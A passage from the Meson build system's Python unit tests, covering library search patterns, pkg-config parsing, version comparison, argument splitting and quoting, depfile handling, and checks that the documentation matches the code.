shrstc = shr + tuple([x for x in stc if x not in shr])
stcshr = stc + tuple([x for x in shr if x not in stc])
p = cc.get_library_naming(env, LibType.SHARED)
self.assertEqual(p, shr)
p = cc.get_library_naming(env, LibType.STATIC)
self.assertEqual(p, stc)
p = cc.get_library_naming(env, LibType.PREFER_STATIC)
self.assertEqual(p, stcshr)
p = cc.get_library_naming(env, LibType.PREFER_SHARED)
self.assertEqual(p, shrstc)
# Test find library by mocking up openbsd
if platform != 'openbsd':
return
with tempfile.TemporaryDirectory() as tmpdir:
with open(os.path.join(tmpdir, 'libfoo.so.6.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.5.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.54.0'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.66a.0b'), 'w') as f:
f.write('')
with open(os.path.join(tmpdir, 'libfoo.so.70.0.so.1'), 'w') as f:
f.write('')
found = cc.find_library_real('foo', env, [tmpdir], '', LibType.PREFER_SHARED)
self.assertEqual(os.path.basename(found[0]), 'libfoo.so.54.0')
def test_find_library_patterns(self):
'''
Unit test for the library search patterns used by find_library()
'''
unix_static = ('lib{}.a', '{}.a')
msvc_static = ('lib{}.a', 'lib{}.lib', '{}.a', '{}.lib')
# This is the priority list of pattern matching for library searching
patterns = {'openbsd': {'shared': ('lib{}.so', '{}.so', 'lib{}.so.[0-9]*.[0-9]*', '{}.so.[0-9]*.[0-9]*'),
'static': unix_static},
'linux': {'shared': ('lib{}.so', '{}.so'),
'static': unix_static},
'darwin': {'shared': ('lib{}.dylib', 'lib{}.so', '{}.dylib', '{}.so'),
'static': unix_static},
'cygwin': {'shared': ('cyg{}.dll', 'cyg{}.dll.a', 'lib{}.dll',
'lib{}.dll.a', '{}.dll', '{}.dll.a'),
'static': ('cyg{}.a',) + unix_static},
'windows-msvc': {'shared': ('lib{}.lib', '{}.lib'),
'static': msvc_static},
'windows-mingw': {'shared': ('lib{}.dll.a', 'lib{}.lib', 'lib{}.dll',
'{}.dll.a', '{}.lib', '{}.dll'),
'static': msvc_static}}
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if is_osx():
self._test_all_naming(cc, env, patterns, 'darwin')
elif is_cygwin():
self._test_all_naming(cc, env, patterns, 'cygwin')
elif is_windows():
if cc.get_argument_syntax() == 'msvc':
self._test_all_naming(cc, env, patterns, 'windows-msvc')
else:
self._test_all_naming(cc, env, patterns, 'windows-mingw')
elif is_openbsd():
self._test_all_naming(cc, env, patterns, 'openbsd')
else:
self._test_all_naming(cc, env, patterns, 'linux')
env.machines.host.system = 'openbsd'
self._test_all_naming(cc, env, patterns, 'openbsd')
env.machines.host.system = 'darwin'
self._test_all_naming(cc, env, patterns, 'darwin')
env.machines.host.system = 'cygwin'
self._test_all_naming(cc, env, patterns, 'cygwin')
env.machines.host.system = 'windows'
self._test_all_naming(cc, env, patterns, 'windows-mingw')
@skipIfNoPkgconfig
def test_pkgconfig_parse_libs(self):
'''
Unit test for parsing of pkg-config output to search for libraries
https://github.com/mesonbuild/meson/issues/3951
'''
def create_static_lib(name):
if not is_osx():
name.open('w').close()
return
src = name.with_suffix('.c')
out = name.with_suffix('.o')
with src.open('w') as f:
f.write('int meson_foobar (void) { return 0; }')
subprocess.check_call(['clang', '-c', str(src), '-o', str(out)])
subprocess.check_call(['ar', 'csr', str(name), str(out)])
with tempfile.TemporaryDirectory() as tmpdir:
pkgbin = ExternalProgram('pkg-config', command=['pkg-config'], silent=True)
env = get_fake_env()
compiler = env.detect_c_compiler(MachineChoice.HOST)
env.coredata.compilers.host = {'c': compiler}
env.coredata.compiler_options.host['c']['link_args'] = FakeCompilerOptions()
p1 = Path(tmpdir) / '1'
p2 = Path(tmpdir) / '2'
p1.mkdir()
p2.mkdir()
# libfoo.a is in one prefix
create_static_lib(p1 / 'libfoo.a')
# libbar.a is in both prefixes
create_static_lib(p1 / 'libbar.a')
create_static_lib(p2 / 'libbar.a')
# Ensure that we never statically link to these
create_static_lib(p1 / 'libpthread.a')
create_static_lib(p1 / 'libm.a')
create_static_lib(p1 / 'libc.a')
create_static_lib(p1 / 'libdl.a')
create_static_lib(p1 / 'librt.a')
def fake_call_pkgbin(self, args, env=None):
if '--libs' not in args:
return 0, '', ''
if args[0] == 'foo':
return 0, '-L{} -lfoo -L{} -lbar'.format(p2.as_posix(), p1.as_posix()), ''
if args[0] == 'bar':
return 0, '-L{} -lbar'.format(p2.as_posix()), ''
if args[0] == 'internal':
return 0, '-L{} -lpthread -lm -lc -lrt -ldl'.format(p1.as_posix()), ''
old_call = PkgConfigDependency._call_pkgbin
old_check = PkgConfigDependency.check_pkgconfig
PkgConfigDependency._call_pkgbin = fake_call_pkgbin
PkgConfigDependency.check_pkgconfig = lambda x, _: pkgbin
# Test begins
try:
kwargs = {'required': True, 'silent': True}
foo_dep = PkgConfigDependency('foo', env, kwargs)
self.assertEqual(foo_dep.get_link_args(),
[(p1 / 'libfoo.a').as_posix(), (p2 / 'libbar.a').as_posix()])
bar_dep = PkgConfigDependency('bar', env, kwargs)
self.assertEqual(bar_dep.get_link_args(), [(p2 / 'libbar.a').as_posix()])
internal_dep = PkgConfigDependency('internal', env, kwargs)
if compiler.get_argument_syntax() == 'msvc':
self.assertEqual(internal_dep.get_link_args(), [])
else:
link_args = internal_dep.get_link_args()
for link_arg in link_args:
for lib in ('pthread', 'm', 'c', 'dl', 'rt'):
self.assertNotIn('lib{}.a'.format(lib), link_arg, msg=link_args)
finally:
# Test ends
PkgConfigDependency._call_pkgbin = old_call
PkgConfigDependency.check_pkgconfig = old_check
# Reset dependency class to ensure that in-process configure doesn't mess up
PkgConfigDependency.pkgbin_cache = {}
PkgConfigDependency.class_pkgbin = PerMachine(None, None)
def test_version_compare(self):
comparefunc = mesonbuild.mesonlib.version_compare_many
for (a, b, result) in [
('0.99.beta19', '>= 0.99.beta14', True),
]:
self.assertEqual(comparefunc(a, b)[0], result)
for (a, b, op) in [
# examples from https://fedoraproject.org/wiki/Archive:Tools/RPM/VersionComparison
("1.0010", "1.9", operator.gt),
("1.05", "1.5", operator.eq),
("1.0", "1", operator.gt),
("2.50", "2.5", operator.gt),
("fc4", "fc.4", operator.eq),
("FC5", "fc4", operator.lt),
("2a", "2.0", operator.lt),
("1.0", "1.fc4", operator.gt),
("3.0.0_fc", "3.0.0.fc", operator.eq),
# from RPM tests
("1.0", "1.0", operator.eq),
("1.0", "2.0", operator.lt),
("2.0", "1.0", operator.gt),
("2.0.1", "2.0.1", operator.eq),
("2.0", "2.0.1", operator.lt),
("2.0.1", "2.0", operator.gt),
("2.0.1a", "2.0.1a", operator.eq),
("2.0.1a", "2.0.1", operator.gt),
("2.0.1", "2.0.1a", operator.lt),
("5.5p1", "5.5p1", operator.eq),
("5.5p1", "5.5p2", operator.lt),
("5.5p2", "5.5p1", operator.gt),
("5.5p10", "5.5p10", operator.eq),
("5.5p1", "5.5p10", operator.lt),
("5.5p10", "5.5p1", operator.gt),
("10xyz", "10.1xyz", operator.lt),
("10.1xyz", "10xyz", operator.gt),
("xyz10", "xyz10", operator.eq),
("xyz10", "xyz10.1", operator.lt),
("xyz10.1", "xyz10", operator.gt),
("xyz.4", "xyz.4", operator.eq),
("xyz.4", "8", operator.lt),
("8", "xyz.4", operator.gt),
("xyz.4", "2", operator.lt),
("2", "xyz.4", operator.gt),
("5.5p2", "5.6p1", operator.lt),
("5.6p1", "5.5p2", operator.gt),
("5.6p1", "6.5p1", operator.lt),
("6.5p1", "5.6p1", operator.gt),
("6.0.rc1", "6.0", operator.gt),
("6.0", "6.0.rc1", operator.lt),
("10b2", "10a1", operator.gt),
("10a2", "10b2", operator.lt),
("1.0aa", "1.0aa", operator.eq),
("1.0a", "1.0aa", operator.lt),
("1.0aa", "1.0a", operator.gt),
("10.0001", "10.0001", operator.eq),
("10.0001", "10.1", operator.eq),
("10.1", "10.0001", operator.eq),
("10.0001", "10.0039", operator.lt),
("10.0039", "10.0001", operator.gt),
("4.999.9", "5.0", operator.lt),
("5.0", "4.999.9", operator.gt),
("20101121", "20101121", operator.eq),
("20101121", "20101122", operator.lt),
("20101122", "20101121", operator.gt),
("2_0", "2_0", operator.eq),
("2.0", "2_0", operator.eq),
("2_0", "2.0", operator.eq),
("a", "a", operator.eq),
("a+", "a+", operator.eq),
("a+", "a_", operator.eq),
("a_", "a+", operator.eq),
("+a", "+a", operator.eq),
("+a", "_a", operator.eq),
("_a", "+a", operator.eq),
("+_", "+_", operator.eq),
("_+", "+_", operator.eq),
("_+", "_+", operator.eq),
("+", "_", operator.eq),
("_", "+", operator.eq),
# other tests
('0.99.beta19', '0.99.beta14', operator.gt),
("1.0.0", "2.0.0", operator.lt),
(".0.0", "2.0.0", operator.lt),
("alpha", "beta", operator.lt),
("1.0", "1.0.0", operator.lt),
("2.456", "2.1000", operator.lt),
("2.1000", "3.111", operator.lt),
("2.001", "2.1", operator.eq),
("2.34", "2.34", operator.eq),
("6.1.2", "6.3.8", operator.lt),
("1.7.3.0", "2.0.0", operator.lt),
("2.24.51", "2.25", operator.lt),
("2.1.5+20120813+gitdcbe778", "2.1.5", operator.gt),
("3.4.1", "3.4b1", operator.gt),
("041206", "200090325", operator.lt),
("0.6.2+git20130413", "0.6.2", operator.gt),
("2.6.0+bzr6602", "2.6.0", operator.gt),
("2.6.0", "2.6b2", operator.gt),
("2.6.0+bzr6602", "2.6b2x", operator.gt),
("0.6.7+20150214+git3a710f9", "0.6.7", operator.gt),
("15.8b", "15.8.0.1", operator.lt),
("1.2rc1", "1.2.0", operator.lt),
]:
ver_a = Version(a)
ver_b = Version(b)
if op is operator.eq:
for o, name in [(op, 'eq'), (operator.ge, 'ge'), (operator.le, 'le')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.lt:
for o, name in [(op, 'lt'), (operator.le, 'le'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.gt, 'gt'), (operator.ge, 'ge'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
if op is operator.gt:
for o, name in [(op, 'gt'), (operator.ge, 'ge'), (operator.ne, 'ne')]:
self.assertTrue(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
for o, name in [(operator.lt, 'lt'), (operator.le, 'le'), (operator.eq, 'eq')]:
self.assertFalse(o(ver_a, ver_b), '{} {} {}'.format(ver_a, name, ver_b))
def test_msvc_toolset_version(self):
'''
Ensure that the toolset version returns the correct value for this MSVC
'''
env = get_fake_env()
cc = env.detect_c_compiler(MachineChoice.HOST)
if cc.get_argument_syntax() != 'msvc':
raise unittest.SkipTest('Test only applies to MSVC-like compilers')
toolset_ver = cc.get_toolset_version()
self.assertIsNotNone(toolset_ver)
# Visual Studio 2015 and older versions do not define VCToolsVersion
# TODO: ICL doesn't set this in the VSC2015 profile either
if cc.id == 'msvc' and int(''.join(cc.version.split('.')[0:2])) < 1910:
return
if 'VCToolsVersion' in os.environ:
vctools_ver = os.environ['VCToolsVersion']
else:
self.assertIn('VCINSTALLDIR', os.environ)
# See https://devblogs.microsoft.com/cppblog/finding-the-visual-c-compiler-tools-in-visual-studio-2017/
vctools_ver = (Path(os.environ['VCINSTALLDIR']) / 'Auxiliary' / 'Build' / 'Microsoft.VCToolsVersion.default.txt').read_text()
self.assertTrue(vctools_ver.startswith(toolset_ver),
msg='{!r} does not start with {!r}'.format(vctools_ver, toolset_ver))
def test_split_args(self):
split_args = mesonbuild.mesonlib.split_args
join_args = mesonbuild.mesonlib.join_args
if is_windows():
test_data = [
# examples from https://docs.microsoft.com/en-us/cpp/c-language/parsing-c-command-line-arguments
(r'"a b c" d e', ['a b c', 'd', 'e'], True),
(r'"ab\"c" "\\" d', ['ab"c', '\\', 'd'], False),
(r'a\\\b d"e f"g h', [r'a\\\b', 'de fg', 'h'], False),
(r'a\\\"b c d', [r'a\"b', 'c', 'd'], False),
(r'a\\\\"b c" d e', [r'a\\b c', 'd', 'e'], False),
# other basics
(r'""', [''], True),
(r'a b c d "" e', ['a', 'b', 'c', 'd', '', 'e'], True),
(r"'a b c' d e", ["'a", 'b', "c'", 'd', 'e'], True),
(r"'a&b&c' d e", ["'a&b&c'", 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], True),
(r"'a & b & c d e'", ["'a", '&', 'b', '&', 'c', 'd', "e'"], True),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
# more illustrative tests
(r'cl test.cpp /O1 /Fe:test.exe', ['cl', 'test.cpp', '/O1', '/Fe:test.exe'], True),
(r'cl "test.cpp /O1 /Fe:test.exe"', ['cl', 'test.cpp /O1 /Fe:test.exe'], True),
(r'cl /DNAME=\"Bob\" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob\"" test.cpp', ['cl', '/DNAME="Bob"', 'test.cpp'], True),
(r'cl /DNAME=\"Bob, Alice\" test.cpp', ['cl', '/DNAME="Bob,', 'Alice"', 'test.cpp'], False),
(r'cl "/DNAME=\"Bob, Alice\"" test.cpp', ['cl', '/DNAME="Bob, Alice"', 'test.cpp'], True),
(r'cl C:\path\with\backslashes.cpp', ['cl', r'C:\path\with\backslashes.cpp'], True),
(r'cl C:\\path\\with\\double\\backslashes.cpp', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], True),
(r'cl "C:\\path\\with\\double\\backslashes.cpp"', ['cl', r'C:\\path\\with\\double\\backslashes.cpp'], False),
(r'cl C:\path with spaces\test.cpp', ['cl', r'C:\path', 'with', r'spaces\test.cpp'], False),
(r'cl "C:\path with spaces\test.cpp"', ['cl', r'C:\path with spaces\test.cpp'], True),
(r'cl /DPATH="C:\path\with\backslashes test.cpp', ['cl', r'/DPATH=C:\path\with\backslashes test.cpp'], False),
(r'cl /DPATH=\"C:\\ends\\with\\backslashes\\\" test.cpp', ['cl', r'/DPATH="C:\\ends\\with\\backslashes\"', 'test.cpp'], False),
(r'cl /DPATH="C:\\ends\\with\\backslashes\\" test.cpp', ['cl', '/DPATH=C:\\\\ends\\\\with\\\\backslashes\\', 'test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\"', 'test.cpp'], True),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\ test.cpp'], False),
(r'cl "/DNAME=\"C:\\ends\\with\\backslashes\\\\\"" test.cpp', ['cl', r'/DNAME="C:\\ends\\with\\backslashes\\"', 'test.cpp'], True),
]
else:
test_data = [
(r"'a b c' d e", ['a b c', 'd', 'e'], True),
(r"a/b/c d e", ['a/b/c', 'd', 'e'], True),
(r"a\b\c d e", [r'abc', 'd', 'e'], False),
(r"a\\b\\c d e", [r'a\b\c', 'd', 'e'], False),
(r'"a b c" d e', ['a b c', 'd', 'e'], False),
(r'"a\\b\\c\\" d e', ['a\\b\\c\\', 'd', 'e'], False),
(r"'a\b\c\' d e", ['a\\b\\c\\', 'd', 'e'], True),
(r"'a&b&c' d e", ['a&b&c', 'd', 'e'], True),
(r"a & b & c d e", ['a', '&', 'b', '&', 'c', 'd', 'e'], False),
(r"'a & b & c d e'", ['a & b & c d e'], True),
(r"abd'e f'g h", [r'abde fg', 'h'], False),
('a b\nc\rd \n\re', ['a', 'b', 'c', 'd', 'e'], False),
('g++ -DNAME="Bob" test.cpp', ['g++', '-DNAME=Bob', 'test.cpp'], False),
("g++ '-DNAME=\"Bob\"' test.cpp", ['g++', '-DNAME="Bob"', 'test.cpp'], True),
('g++ -DNAME="Bob, Alice" test.cpp', ['g++', '-DNAME=Bob, Alice', 'test.cpp'], False),
("g++ '-DNAME=\"Bob, Alice\"' test.cpp", ['g++', '-DNAME="Bob, Alice"', 'test.cpp'], True),
]
for (cmd, expected, roundtrip) in test_data:
self.assertEqual(split_args(cmd), expected)
if roundtrip:
self.assertEqual(join_args(expected), cmd)
def test_quote_arg(self):
split_args = mesonbuild.mesonlib.split_args
quote_arg = mesonbuild.mesonlib.quote_arg
if is_windows():
test_data = [
('', '""'),
('arg1', 'arg1'),
('/option1', '/option1'),
('/Ovalue', '/Ovalue'),
('/OBob&Alice', '/OBob&Alice'),
('/Ovalue with spaces', r'"/Ovalue with spaces"'),
(r'/O"value with spaces"', r'"/O\"value with spaces\""'),
(r'/OC:\path with spaces\test.exe', r'"/OC:\path with spaces\test.exe"'),
('/LIBPATH:C:\\path with spaces\\ends\\with\\backslashes\\', r'"/LIBPATH:C:\path with spaces\ends\with\backslashes\\"'),
('/LIBPATH:"C:\\path with spaces\\ends\\with\\backslashes\\\\"', r'"/LIBPATH:\"C:\path with spaces\ends\with\backslashes\\\\\""'),
(r'/DMSG="Alice said: \"Let\'s go\""', r'"/DMSG=\"Alice said: \\\"Let\'s go\\\"\""'),
]
else:
test_data = [
('arg1', 'arg1'),
('--option1', '--option1'),
('-O=value', '-O=value'),
('-O=Bob&Alice', "'-O=Bob&Alice'"),
('-O=value with spaces', "'-O=value with spaces'"),
('-O="value with spaces"', '\'-O=\"value with spaces\"\''),
('-O=/path with spaces/test', '\'-O=/path with spaces/test\''),
('-DMSG="Alice said: \\"Let\'s go\\""', "'-DMSG=\"Alice said: \\\"Let'\"'\"'s go\\\"\"'"),
]
for (arg, expected) in test_data:
self.assertEqual(quote_arg(arg), expected)
self.assertEqual(split_args(expected)[0], arg)
def test_depfile(self):
for (f, target, expdeps) in [
# empty, unknown target
([''], 'unknown', set()),
# simple target & deps
(['meson/foo.o : foo.c foo.h'], 'meson/foo.o', set({'foo.c', 'foo.h'})),
(['meson/foo.o: foo.c foo.h'], 'foo.c', set()),
# get all deps
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'meson/foo.o', set({'foo.c', 'foo.h', 'gen.py'})),
(['meson/foo.o: foo.c foo.h',
'foo.c: gen.py'], 'foo.c', set({'gen.py'})),
# linue continuation, multiple targets
(['foo.o \\', 'foo.h: bar'], 'foo.h', set({'bar'})),
(['foo.o \\', 'foo.h: bar'], 'foo.o', set({'bar'})),
# \\ handling
(['foo: Program\\ F\\iles\\\\X'], 'foo', set({'Program Files\\X'})),
# $ handling
(['f$o.o: c/b'], 'f$o.o', set({'c/b'})),
(['f$$o.o: c/b'], 'f$o.o', set({'c/b'})),
# cycles
(['a: b', 'b: a'], 'a', set({'a', 'b'})),
(['a: b', 'b: a'], 'b', set({'a', 'b'})),
]:
d = mesonbuild.depfile.DepFile(f)
deps = d.get_all_dependencies(target)
self.assertEqual(deps, expdeps)
def test_log_once(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once('foo')
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual, 'foo', actual)
def test_log_once_ansi(self):
f = io.StringIO()
with mock.patch('mesonbuild.mlog.log_file', f), \
mock.patch('mesonbuild.mlog._logged_once', set()):
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
mesonbuild.mlog.log_once(mesonbuild.mlog.bold('foo'))
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
mesonbuild.mlog.log_once('foo')
actual = f.getvalue().strip()
self.assertEqual(actual.count('foo'), 1, actual)
f.truncate()
mesonbuild.mlog.warning('bar', once=True)
mesonbuild.mlog.warning('bar', once=True)
actual = f.getvalue().strip()
self.assertEqual(actual.count('bar'), 1, actual)
def test_sort_libpaths(self):
sort_libpaths = mesonbuild.dependencies.base.sort_libpaths
self.assertEqual(sort_libpaths(
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/local/lib', '/home/mesonuser/.local/lib', '/usr/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/lib/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
self.assertEqual(sort_libpaths(
['/usr/lib', '/usr/local/lib', '/home/mesonuser/.local/lib'],
['/home/mesonuser/.local/lib/pkgconfig', '/usr/local/libdata/pkgconfig']),
['/home/mesonuser/.local/lib', '/usr/local/lib', '/usr/lib'])
def test_dependency_factory_order(self):
b = mesonbuild.dependencies.base
with tempfile.TemporaryDirectory() as tmpdir:
with chdir(tmpdir):
env = get_fake_env()
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.PKGCONFIG, b.DependencyMethods.CMAKE]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['pkgconfig', 'cmake'])
f = b.DependencyFactory(
'test_dep',
methods=[b.DependencyMethods.CMAKE, b.DependencyMethods.PKGCONFIG]
)
actual = [m() for m in f(env, MachineChoice.HOST, {'required': False})]
self.assertListEqual([m.type_name for m in actual], ['cmake', 'pkgconfig'])
def test_validate_json(self) -> None:
"""Validate the json schema for the test cases."""
try:
from jsonschema import validate, ValidationError
except ImportError:
if is_ci():
raise
raise unittest.SkipTest('Python jsonschema module not found.')
with Path('data/test.schema.json').open() as f:
schema = json.load(f)
errors = [] # type: T.Tuple[str, Exception]
for p in Path('test cases').glob('**/test.json'):
with p.open() as f:
try:
validate(json.load(f), schema=schema)
except ValidationError as e:
errors.append((p.resolve(), e))
for f, e in errors:
print('Failed to validate: "{}"'.format(f))
print(str(e))
self.assertFalse(errors)
@unittest.skipIf(is_tarball(), 'Skipping because this is a tarball release')
class DataTests(unittest.TestCase):
def test_snippets(self):
hashcounter = re.compile('^ *(#)+')
snippet_dir = Path('docs/markdown/snippets')
self.assertTrue(snippet_dir.is_dir())
for f in snippet_dir.glob('*'):
self.assertTrue(f.is_file())
if f.parts[-1].endswith('~'):
continue
if f.suffix == '.md':
in_code_block = False
with f.open() as snippet:
for line in snippet:
if line.startswith(' '):
continue
if line.startswith('```'):
in_code_block = not in_code_block
if in_code_block:
continue
m = re.match(hashcounter, line)
if m:
self.assertEqual(len(m.group(0)), 2, 'All headings in snippets must have two hash symbols: ' + f.name)
self.assertFalse(in_code_block, 'Unclosed code block.')
else:
if f.name != 'add_release_note_snippets_here':
self.assertTrue(False, 'A file without .md suffix in snippets dir: ' + f.name)
def test_compiler_options_documented(self):
'''
Test that C and C++ compiler options and base options are documented in
Builtin-Options.md. Only tests the default compiler for the current
platform on the CI.
'''
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
env = get_fake_env()
# FIXME: Support other compilers
cc = env.detect_c_compiler(MachineChoice.HOST)
cpp = env.detect_cpp_compiler(MachineChoice.HOST)
for comp in (cc, cpp):
for opt in comp.get_options().keys():
self.assertIn(opt, md)
for opt in comp.base_options:
self.assertIn(opt, md)
self.assertNotIn('b_unknown', md)
@staticmethod
def _get_section_content(name, sections, md):
for section in sections:
if section and section.group(1) == name:
try:
next_section = next(sections)
end = next_section.start()
except StopIteration:
end = len(md)
# Extract the content for this section
return md[section.end():end]
raise RuntimeError('Could not find "{}" heading'.format(name))
def test_builtin_options_documented(self):
'''
Test that universal options and base options are documented in
Builtin-Options.md.
'''
from itertools import tee
md = None
with open('docs/markdown/Builtin-options.md', encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
found_entries = set()
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
# Extract the content for this section
content = self._get_section_content("Universal options", sections, md)
subsections = tee(re.finditer(r"^### (.+)$", content, re.MULTILINE))
subcontent1 = self._get_section_content("Directories", subsections[0], content)
subcontent2 = self._get_section_content("Core options", subsections[1], content)
for subcontent in (subcontent1, subcontent2):
# Find the option names
options = set()
# Match either a table row or a table heading separator: | ------ |
rows = re.finditer(r"^\|(?: (\w+) .* | *-+ *)\|", subcontent, re.MULTILINE)
# Skip the header of the first table
next(rows)
# Skip the heading separator of the first table
next(rows)
for m in rows:
value = m.group(1)
# End when the `buildtype` table starts
if value is None:
break
options.add(value)
self.assertEqual(len(found_entries & options), 0)
found_entries |= options
self.assertEqual(found_entries, set([
*mesonbuild.coredata.builtin_options.keys(),
*mesonbuild.coredata.builtin_options_per_machine.keys()
]))
# Check that `buildtype` table inside `Core options` matches how
# setting of builtin options behaves
#
# Find all tables inside this subsection
tables = re.finditer(r"^\| (\w+) .* \|\n\| *[-|\s]+ *\|$", subcontent2, re.MULTILINE)
# Get the table we want using the header of the first column
table = self._get_section_content('buildtype', tables, subcontent2)
# Get table row data
rows = re.finditer(r"^\|(?: (\w+)\s+\| (\w+)\s+\| (\w+) .* | *-+ *)\|", table, re.MULTILINE)
env = get_fake_env()
for m in rows:
buildtype, debug, opt = m.groups()
if debug == 'true':
debug = True
elif debug == 'false':
debug = False
else:
raise RuntimeError('Invalid debug value {!r} in row:\n{}'.format(debug, m.group()))
env.coredata.set_builtin_option('buildtype', buildtype)
self.assertEqual(env.coredata.builtins['buildtype'].value, buildtype)
self.assertEqual(env.coredata.builtins['optimization'].value, opt)
self.assertEqual(env.coredata.builtins['debug'].value, debug)
def test_cpu_families_documented(self):
with open("docs/markdown/Reference-tables.md", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
sections = re.finditer(r"^## (.+)$", md, re.MULTILINE)
content = self._get_section_content("CPU families", sections, md)
# Find the list entries
arches = [m.group(1) for m in re.finditer(r"^\| (\w+) +\|", content, re.MULTILINE)]
# Drop the header
arches = set(arches[1:])
self.assertEqual(arches, set(mesonbuild.environment.known_cpu_families))
def test_markdown_files_in_sitemap(self):
'''
Test that each markdown files in docs/markdown is referenced in sitemap.txt
'''
with open("docs/sitemap.txt", encoding='utf-8') as f:
md = f.read()
self.assertIsNotNone(md)
toc = list(m.group(1) for m in re.finditer(r"^\s*(\w.*)$", md, re.MULTILINE))
markdownfiles = [f.name for f in Path("docs/markdown").iterdir() if f.is_file() and f.suffix == '.md']
exceptions = ['_Sidebar.md']
for f in markdownfiles:
if f not in exceptions:
self.assertIn(f, toc)
def test_vim_syntax_highlighting(self):
'''
Ensure that vim syntax highlighting files were updated for new
functions in the global namespace in build files.
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
with open('data/syntax-highlighting/vim/syntax/meson.vim') as f:
res = re.search(r'syn keyword mesonBuiltin(\s+\\\s\w+)+', f.read(), re.MULTILINE)
defined = set([a.strip() for a in res.group().split('\\')][1:])
self.assertEqual(defined, set(chain(interp.funcs.keys(), interp.builtin.keys())))
@unittest.skipIf(is_pull(), 'Skipping because this is a pull request')
def test_json_grammar_syntax_highlighting(self):
'''
Ensure that syntax highlighting JSON grammar written by TingPing was
updated for new functions in the global namespace in build files.
https://github.com/TingPing/language-meson/
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
url = 'https://raw.githubusercontent.com/TingPing/language-meson/master/grammars/meson.json'
try:
# Use a timeout to avoid blocking forever in case the network is
# slow or unavailable in a weird way
r = urllib.request.urlopen(url, timeout=URLOPEN_TIMEOUT)
except urllib.error.URLError as e:
# Skip test when network is not available, such as during packaging
# by a distro or Flatpak
if not isinstance(e, urllib.error.HTTPError):
raise unittest.SkipTest('Network unavailable')
# Don't fail the test if github is down, but do fail if 4xx
if e.code >= 500:
raise unittest.SkipTest('Server error ' + str(e.code))
raise e
# On Python 3.5, we must decode bytes to string. Newer versions don't require that.
grammar = json.loads(r.read().decode('utf-8', 'surrogatepass'))
for each in grammar['patterns']:
if 'name' in each and each['name'] == 'support.function.builtin.meson':
# The string is of the form: (?x)\\b(func1|func2|...\n)\\b\\s*(?=\\() and
# we convert that to [func1, func2, ...] without using regex to parse regex
funcs = set(each['match'].split('\\b(')[1].split('\n')[0].split('|'))
if 'name' in each and each['name'] == 'support.variable.meson':
# \\b(builtin1|builtin2...)\\b
builtin = set(each['match'].split('\\b(')[1].split(')\\b')[0].split('|'))
self.assertEqual(builtin, set(interp.builtin.keys()))
self.assertEqual(funcs, set(interp.funcs.keys()))
def test_all_functions_defined_in_ast_interpreter(self):
'''
Ensure that the all functions defined in the Interpreter are also defined
in the AstInterpreter (and vice versa).
'''
env = get_fake_env()
interp = Interpreter(FakeBuild(env), mock=True)
astint = AstInterpreter('.', '', '')
self.assertEqual(set(interp.funcs.keys()), set(astint.funcs.keys()))
class BasePlatformTests(unittest.TestCase):
def setUp(self):
super().setUp()
self.maxDiff = None
src_root = os.path.dirname(__file__)
src_root = os.path.join(os.getcwd(), src_root)
self.src_root = src_root
self.prefix = '/usr'
self.libdir = 'lib'
# Get the backend
# FIXME: Extract this from argv?
self.backend = getattr(Backend, os.environ.get('MESON_UNIT_TEST_BACKEND', 'ninja'))
self.meson_args = ['--backend=' + self.backend.name]
self.meson_native_file = None
self.meson_cross_file = None
self.meson_command = python_command + [get_meson_script()]
self.setup_command = self.meson_command + self.meson_args
self.mconf_command = self.meson_command + ['configure']
self.mintro_command = self.meson_command + ['introspect']
self.wrap_command = self.meson_command + ['wrap']
self.rewrite_command = self.meson_command + ['rewrite']
# Backend-specific build commands
